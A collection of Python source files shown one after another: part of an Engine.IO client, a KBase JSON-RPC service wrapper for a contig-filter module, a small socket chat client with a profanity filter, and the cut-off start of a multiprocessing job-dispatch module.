self._send_packet(packet.Packet(packet.MESSAGE, data=data,
binary=binary))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object compatible with the `Thread` class in
the Python standard library. The `start()` method on this object is
already called by this function.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers)
if r is None:
self._reset()
raise exceptions.ConnectionError(
'Connection refused by the server')
if r.status_code != 200:
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code))
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
six.raise_from(exceptions.ConnectionError(
'Unexpected response from server'), None)
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.warning('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers)
except ConnectionError:
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = open_packet.data['pingInterval'] / 1000.0
self.ping_timeout = open_packet.data['pingTimeout'] / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
# start background tasks associated with this client
self.ping_loop_task = self.start_background_task(self._ping_loop)
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PONG:
self.pong_received = True
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
try:
return self.http.request(method, url, headers=headers, data=body)
except requests.exceptions.ConnectionError:
pass
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=3').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
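    # Hedged illustration of the URL produced by _get_engineio_url above, e.g.
    # for ('https://example.com/?room=1', 'engine.io', 'websocket') it returns:
    #     wss://example.com/engine.io/?room=1&transport=websocket&EIO=3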
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _ping_loop(self):
"""This background task sends a PING to the server at the requested
interval.
"""
self.pong_received = True
self.ping_loop_event.clear()
while self.state == 'connected':
if not self.pong_received:
self.logger.warning(
'PONG response has not been received, aborting')
if self.ws:
self.ws.close()
self.queue.put(None)
break
self.pong_received = False
self._send_packet(packet.Packet(packet.PING))
self.ping_loop_event.wait(timeout=self.ping_interval)
self.logger.info('Exiting ping task')
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp())
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content)
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error "%s", aborting', str(e))
self.queue.put(None)
break
if isinstance(p, six.text_type): # pragma: no cover
p = p.encode('utf-8')
pkt = packet.Packet(encoded_packet=p)
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
self.logger.info('Waiting for ping loop task to end')
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
    def _write_loop(self):
        """This background task sends packets to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
self._reset()
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'application/octet-stream'})
for pkt in packets:
self.queue.task_done()
if r is None:
self.logger.warning(
'Connection refused by the server, aborting')
break
if r.status_code != 200:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
self.ws.send(pkt.encode())
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
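# A minimal, hedged usage sketch of the Client defined above. The URL is a placeholder
# and assumes an Engine.IO server is reachable there; nothing runs on import.
if __name__ == '__main__':  # pragma: no cover
    eio = Client(logger=True)

    @eio.on('message')
    def on_message(data):
        # Print whatever the server pushes, then acknowledge it.
        print('received:', data)
        eio.send('ack')

    eio.connect('http://localhost:5000')
    eio.send('hello')
    eio.wait()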
|
ccl_ContigFilterServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from ccl_ContigFilter.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'ccl_ContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
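# Hedged illustration of the INI-style deployment config consumed by get_config();
# the section name matches the service name and every key/value pair is copied into
# the flat dict returned above (values below are placeholders, not real endpoints):
#     [ccl_ContigFilter]
#     auth-service-url = https://example.org/services/auth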
config = get_config()
from ccl_ContigFilter.ccl_ContigFilterImpl import ccl_ContigFilter # noqa @IgnorePep8
impl_ccl_ContigFilter = ccl_ContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
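# Hedged illustration only (not used directly by the server below): JSONObjectEncoder
# lets json.dumps serialize sets and frozensets by converting them to lists, e.g.
#     json.dumps({'tags': {'b'}}, cls=JSONObjectEncoder)  ->  '{"tags": ["b"]}'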
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
        # we already deserialized the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
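# Hedged illustration of the precedence implemented in getIPAddress above, using a
# fake WSGI environ (standard CGI-style keys, placeholder addresses):
#     getIPAddress({'HTTP_X_FORWARDED_FOR': '1.2.3.4, 10.0.0.1',
#                   'REMOTE_ADDR': '10.0.0.1'})  ->  '1.2.3.4'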
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'ccl_ContigFilter'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_ccl_ContigFilter.run_ccl_ContigFilter,
name='ccl_ContigFilter.run_ccl_ContigFilter',
types=[dict])
self.method_authentication['ccl_ContigFilter.run_ccl_ContigFilter'] = 'required' # noqa
self.rpc_service.add(impl_ccl_ContigFilter.run_ccl_ContigFilter_max,
name='ccl_ContigFilter.run_ccl_ContigFilter_max',
types=[dict])
self.method_authentication['ccl_ContigFilter.run_ccl_ContigFilter_max'] = 'required' # noqa
self.rpc_service.add(impl_ccl_ContigFilter.status,
name='ccl_ContigFilter.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'ccl_ContigFilter ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    also allows the assigned port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
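# Hedged usage sketch of the two helpers above (e.g. from a test harness); port 0
# lets the OS pick a free port, and newprocess=True makes stop_server() usable:
#     port = start_server(newprocess=True)
#     ... issue JSON-RPC POST requests against http://localhost:<port> ...
#     stop_server()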
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
client.py
|
import socket
import threading
import platform
import os
from better_profanity import profanity
import colorgb
from time import sleep
class Client:
    """A class that implements the client side of the chat.
    -----------
    Parameters :
    - username: `str` | Set your username to connect to the server.
    - username_color: `str` | Set your username color. See the list of available colors below. (Default: `None`)
    - badword_filter: `True/False` | Censor profane words in incoming messages. (Default: True)
    ----
Basic Colors :
- `black`
- `red`
- `green`
- `yellow`
- `blue`
- `purple`
- `cyan`
- `white`
-----
Light Colors :
- `grey`
- `lred`
- `lgreen`
- `lyellow`
- `lblue`
- `lpurple`
- `lcyan`
"""
def __init__(self, username:str, username_color:str=None, badword_filter=True):
        if username_color is None:
self.username = username
else:
self.username = f"{colorgb.fore(username, username_color)}"
self.badword_filter = badword_filter
    def connect(self, server_ip:str, server_port:int):
        r"""Connect to the server.
        -----------
        Parameters :
        - server_ip: `str` | Server IP
        - server_port: `int` | Server Port
        """
nickname = self.username
try:
print(f"Connecting to {server_ip}:{server_port}...")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((server_ip, server_port))
except socket.error as error:
print()
print(colorgb.fore("An error occurred :", "lred"))
sleep(0.5)
print(error)
print()
client.close()
exit()
def receive():
badword_filter = self.badword_filter
while True:
try:
message = client.recv(1024).decode('UTF-8')
if message == 'NICK':
client.send(nickname.encode('UTF-8'))
else:
                        if badword_filter:
censored = profanity.censor(message)
print(censored)
else:
print(message)
except socket.error as error:
print()
print(colorgb.fore("An error occurred :", "lred"))
sleep(0.5)
print(error)
client.close()
exit()
def write():
while True:
input_msg = input('')
if input_msg == "//clear":
if platform.uname()[0] == "Windows":
os.system("cls")
else:
os.system("clear")
else:
message = f'{nickname}: {input_msg}'
client.send(message.encode('UTF-8'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
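# A minimal, hedged usage sketch; the address below is a placeholder and assumes a
# compatible chat server is already listening there.
if __name__ == "__main__":
    chat = Client(username="alice", username_color="lblue", badword_filter=True)
    chat.connect("127.0.0.1", 55555)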
|
process.py
|
import logging
import multiprocessing
import multiprocessing.managers
import os
import socket
import stat
import subprocess
import time
from queue import Queue
import numpy
from .util import substitute_file, create_scratch_directory, CalcItJobCreateError
# delays in seconds to different processes
MANAGER_SHUTDOWN_DELAY = 3
JOB_QUEUE_NAME = 'get_job_queue'
RES_QUEUE_NAME = 'get_result_queue'
#logging.basicConfig(level=logging.INFO)
def process_jobs(port, authorization_key, jobs, nodes, jobs_per_node, work_dir, remote_shell, global_paths, do_execute):
    """ Parallel processing of the jobs given on input, distributed over the
    available nodes.
Arguments:
      port -- the port used for communication
authorization_key -- program secret used to identify correct server
jobs -- the jobs to execute
nodes -- list of nodes to use during processing
jobs_per_node -- number of jobs to start per node
work_dir -- the work directory where the slave should be launched from
remote_shell -- the remote shell to use when connecting to nodes
global_paths -- directories used to find calcit and its data folders.
NB! This is different from work_dir and scratch directories
in that global_paths have nothing to do with computations
do_execute -- whether or not to actually execute calculations
"""
def send_jobs_to_queue(jobs, job_queue):
""" Sends jobs to the job queue specified on input
        We wrap it like this so we can shut down the server appropriately
        without causing hangups.
Raises:
